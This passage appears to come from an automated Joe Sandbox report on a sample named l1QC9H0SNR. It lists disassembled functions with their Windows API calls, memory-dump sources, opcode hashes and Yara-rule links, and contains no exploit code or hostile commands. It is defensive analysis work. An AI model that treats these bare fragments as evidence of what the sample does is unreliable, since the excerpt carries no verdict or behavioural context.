                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c50ccda27b2b409b8159b045ede53cc50f3dd673fe1d614405ca84f1e4970dee
                                              • Instruction ID: c97da53f7347dfe21de736acfb8a3b5947acb82f1c6a6c99d2620d7b096824ff
                                              • Opcode Fuzzy Hash: c50ccda27b2b409b8159b045ede53cc50f3dd673fe1d614405ca84f1e4970dee
                                              • Instruction Fuzzy Hash: 95F139716083059FCB14DF28C480A6ABBE5FF99314F1489AEF89A9B351D730E945CF82
                                              Function 00B5F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B70162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B70193
                                                • Part of subcall function 00B70162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B7019B
                                                • Part of subcall function 00B70162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B701A6
                                                • Part of subcall function 00B70162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B701B1
                                                • Part of subcall function 00B70162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B701B9
                                                • Part of subcall function 00B70162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B701C1
                                                • Part of subcall function 00B660F9: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00B66154
                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B5F9CD
                                              • OleInitialize.OLE32(00000000), ref: 00B5FA4A
                                              • CloseHandle.KERNEL32(00000000), ref: 00B945C8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                              • String ID:
                                              • API String ID: 3094916012-0
                                              • Opcode ID: aa786e454a7c1beffbf9c654cddaea032458b37ed44d1394a542647dbbbd3749
                                              • Instruction ID: 58467768f47ddd3c81433d0aa3aeeb955ee91025df59434d8c80674cd4ff7166
                                              • Opcode Fuzzy Hash: aa786e454a7c1beffbf9c654cddaea032458b37ed44d1394a542647dbbbd3749
                                              • Instruction Fuzzy Hash: F781CCB0915A40CEC784DF29E8817DCBBE5FBDB306790C1AAA019CB3B1EB7044858F55
                                              Function 00B5434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00B54370
                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B54415
                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B54432
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_$_memset
                                              • String ID:
                                              • API String ID: 1505330794-0
                                              • Opcode ID: a6cff9cbae200312e62c4832060d248716072512ab1e4a2005ea1970b993bd8f
                                              • Instruction ID: 0e6775b137a8643b284c84068eed8c9e284b7777b0bd54af16b024f9d97ba828
                                              • Opcode Fuzzy Hash: a6cff9cbae200312e62c4832060d248716072512ab1e4a2005ea1970b993bd8f
                                              • Instruction Fuzzy Hash: 45318071505701DFC721DF24D88479BBBF8FB49309F0049AEE99A87251E7B0A988CB52
                                              Function 00B7571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • __FF_MSGBANNER.LIBCMT ref: 00B75733
                                                • Part of subcall function 00B7A16B: __NMSG_WRITE.LIBCMT ref: 00B7A192
                                                • Part of subcall function 00B7A16B: __NMSG_WRITE.LIBCMT ref: 00B7A19C
                                              • __NMSG_WRITE.LIBCMT ref: 00B7573A
                                                • Part of subcall function 00B7A1C8: GetModuleFileNameW.KERNEL32(00000000,00C133BA,00000104,00000000,00000001,00000000), ref: 00B7A25A
                                                • Part of subcall function 00B7A1C8: ___crtMessageBoxW.LIBCMT ref: 00B7A308
                                                • Part of subcall function 00B7309F: ___crtCorExitProcess.LIBCMT ref: 00B730A5
                                                • Part of subcall function 00B7309F: ExitProcess.KERNEL32 ref: 00B730AE
                                                • Part of subcall function 00B78B28: __getptd_noexit.LIBCMT ref: 00B78B28
                                              • RtlAllocateHeap.NTDLL(00F80000,00000000,00000001), ref: 00B7575F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                              • String ID:
                                              • API String ID: 1372826849-0
                                              • Opcode ID: e14430ae9741bbb880673444767a5be10a5d71f0d089c610cb50d6f359253e39
                                              • Instruction ID: 052577923be417da4ba72afca69f90381bdf7b826858ae6ae5612e09afe001d2
                                              • Opcode Fuzzy Hash: e14430ae9741bbb880673444767a5be10a5d71f0d089c610cb50d6f359253e39
                                              • Instruction Fuzzy Hash: 7801D231244A02DAE6292738AC82B6E63C8DB82762F1080A5F43DEB281DEB09D014660
                                              Function 00BB98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00BB9548,?,?,?,?,?,00000004), ref: 00BB98BB
                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00BB9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00BB98D1
                                              • CloseHandle.KERNEL32(00000000,?,00BB9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BB98D8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateHandleTime
                                              • String ID:
                                              • API String ID: 3397143404-0
                                              • Opcode ID: 251c3266143260f89d1b877c7cd246278ed76fb63c12af8ad81deef16cc49fcd
                                              • Instruction ID: dddc0433c6970e43308bbddd74fe6aafe15e5d4121c257e4ab68b03d905cf05f
                                              • Opcode Fuzzy Hash: 251c3266143260f89d1b877c7cd246278ed76fb63c12af8ad81deef16cc49fcd
                                              • Instruction Fuzzy Hash: B2E08632146225B7D7211B54EC09FEABF59EF06B70F104121FB157A0E09BB11A119798
                                              Function 00BB8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00BB8D1B
                                                • Part of subcall function 00B72D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00B79A24), ref: 00B72D69
                                                • Part of subcall function 00B72D55: GetLastError.KERNEL32(00000000,?,00B79A24), ref: 00B72D7B
                                              • _free.LIBCMT ref: 00BB8D2C
                                              • _free.LIBCMT ref: 00BB8D3E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                              • Instruction ID: 1c6bd86f07bbaf6ca1a6bc234ad92ac0c8f186dc2d95ca0260f276e2bdc3557a
                                              • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                              • Instruction Fuzzy Hash: 2DE012A160160157CB34A679A940AE313DC8F5835271449BEB41DD7186CEA4F842C124
                                              Function 00B5A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CALL
                                              • API String ID: 0-4196123274
                                              • Opcode ID: 0767369bc6551722374289b9c17469c8933d4520eee1796384f5a6ad11d31cc5
                                              • Instruction ID: 16cade2d6ac3dafe901ab27ca086340fb43f73bf2d7880c291604f146d08d9dc
                                              • Opcode Fuzzy Hash: 0767369bc6551722374289b9c17469c8933d4520eee1796384f5a6ad11d31cc5
                                              • Instruction Fuzzy Hash: 6B223770508201DFDB24EF14C494B6ABBE1FF89305F1589EDE89A9B261D731ED49CB82
                                              Function 00B54C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID: EA06
                                              • API String ID: 4104443479-3962188686
                                              • Opcode ID: cb9333909c27bae07445e8891500a4bfc90a11d5c568b52ea79617b9ff919afe
                                              • Instruction ID: 9b6e0d4b73defcbf86d46f40a85c1940afea7c508adc8db1f3ba37820e96ad39
                                              • Opcode Fuzzy Hash: cb9333909c27bae07445e8891500a4bfc90a11d5c568b52ea79617b9ff919afe
                                              • Instruction Fuzzy Hash: ED415D21A0415867DF229B6488927BE7FF1DB4530AF2844F5EC869B2C2D7245DCD83A1
                                              Function 00B547D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                              Download Yara Rule
                                              APIs
                                              • 74A3C8D0.UXTHEME ref: 00B54834
                                                • Part of subcall function 00B7336C: __lock.LIBCMT ref: 00B73372
                                                • Part of subcall function 00B7336C: RtlDecodePointer.NTDLL(00000001), ref: 00B7337E
                                                • Part of subcall function 00B7336C: RtlEncodePointer.NTDLL(?), ref: 00B73389
                                                • Part of subcall function 00B548FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B54915
                                                • Part of subcall function 00B548FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B5492A
                                                • Part of subcall function 00B53B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B53B68
                                                • Part of subcall function 00B53B3A: IsDebuggerPresent.KERNEL32 ref: 00B53B7A
                                                • Part of subcall function 00B53B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C152F8,00C152E0,?,?), ref: 00B53BEB
                                                • Part of subcall function 00B53B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00B53C6F
                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B54874
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                                              • String ID:
                                              • API String ID: 2688871447-0
                                              • Opcode ID: 6c864644345f32ba2d2b8014b179c1015e06814c3e886bff41c0a613ca67d068
                                              • Instruction ID: 364d39d37853042a28bf1b4114ff9d195bf8b18bf0256ee60d8827e9f75c7169
                                              • Opcode Fuzzy Hash: 6c864644345f32ba2d2b8014b179c1015e06814c3e886bff41c0a613ca67d068
                                              • Instruction Fuzzy Hash: D1118C72908341DFC700DF68E845B4EBBE8FB96750F10859EF455872B1DBB09A48CB92
                                              Function 00B55C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00B55821,?,?,?,?), ref: 00B55CC7
                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00B55821,?,?,?,?), ref: 00B8DD73
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 094284bc86861249283c325129b76087e55008498543e2d96fe07692ed1fbaba
                                              • Instruction ID: c9d4bb2983c8d3c9680a08e930b5539ab81ba0233c4e03cb5bb7e07142d95f26
                                              • Opcode Fuzzy Hash: 094284bc86861249283c325129b76087e55008498543e2d96fe07692ed1fbaba
                                              • Instruction Fuzzy Hash: B3016D70244748BEF2301E24CC9AF767BDCEB0576AF108399BAE5AA1E0C6B45C488B50
                                              Function 00B755FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __lock_file_memset
                                              • String ID:
                                              • API String ID: 26237723-0
                                              • Opcode ID: 40e7704e8706b862a21c5d7ceaf299dc28a4ed30096919d2764fc7a90d7f7546
                                              • Instruction ID: b6cbb99f06b01e976c9de49d4aabbd57c775156c8ee9abe49e7d337872e2e7d7
                                              • Opcode Fuzzy Hash: 40e7704e8706b862a21c5d7ceaf299dc28a4ed30096919d2764fc7a90d7f7546
                                              • Instruction Fuzzy Hash: 5C018471C00A09ABCF32AF649C0649E7BE1EF51361F54C1A5B83C5A191DB71CA51DF91
                                              Function 00B753A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B78B28: __getptd_noexit.LIBCMT ref: 00B78B28
                                              • __lock_file.LIBCMT ref: 00B753EB
                                                • Part of subcall function 00B76C11: __lock.LIBCMT ref: 00B76C34
                                              • __fclose_nolock.LIBCMT ref: 00B753F6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                              • String ID:
                                              • API String ID: 2800547568-0
                                              • Opcode ID: 8ede77047b2177a498b39854dd9ffb89fde64400e90cbb5c475e8477cfb4713d
                                              • Instruction ID: e7e5c5be7c7bfb4f000a7fa486ef9fa16347b7d7eb00af9f7a86785691a55842
                                              • Opcode Fuzzy Hash: 8ede77047b2177a498b39854dd9ffb89fde64400e90cbb5c475e8477cfb4713d
                                              • Instruction Fuzzy Hash: 8CF0BB71800B049AD7316F7598067AD77E06F41374F21C2D8A43DAB1D1CFFC4941AB55
                                              Function 00B61FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8dde90ae16b4451cebadd3eb49954729d56aea94a9e03c57e9b9cb26ec5545a8
                                              • Instruction ID: 4450ed6c656f4228072d0ed5760d1d051a985c56766a8ff913352b8bcbdac908
                                              • Opcode Fuzzy Hash: 8dde90ae16b4451cebadd3eb49954729d56aea94a9e03c57e9b9cb26ec5545a8
                                              • Instruction Fuzzy Hash: DD518A30A00604EBDF24EB68C991FAE77E6AF45311F1480E8F906AB392DA34ED04CB51
                                              Function 010086F0 Relevance: 1.7, APIs: 1, Instructions: 167COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 01007F60: GetFileAttributesW.KERNELBASE(?), ref: 01007F6B
                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0100884C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2131329969.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1007000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AttributesCreateDirectoryFile
                                              • String ID:
                                              • API String ID: 3401506121-0
                                              • Opcode ID: 0b123c2c37f26543cc8b44d8b0353a9df7f5705004a2e2ba94bd6ba47c0da593
                                              • Instruction ID: 2a064f6de4b5c1d8e0607f71dc40e32887721032de3d19a19d79789a331c04b4
                                              • Opcode Fuzzy Hash: 0b123c2c37f26543cc8b44d8b0353a9df7f5705004a2e2ba94bd6ba47c0da593
                                              • Instruction Fuzzy Hash: 98519131A1120996EF14EFA0D804BEF7379FF58300F1085A9A649F72C0EB799B44CB66
                                              Function 00B55AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00B55B96
                                              Memory Dump Source
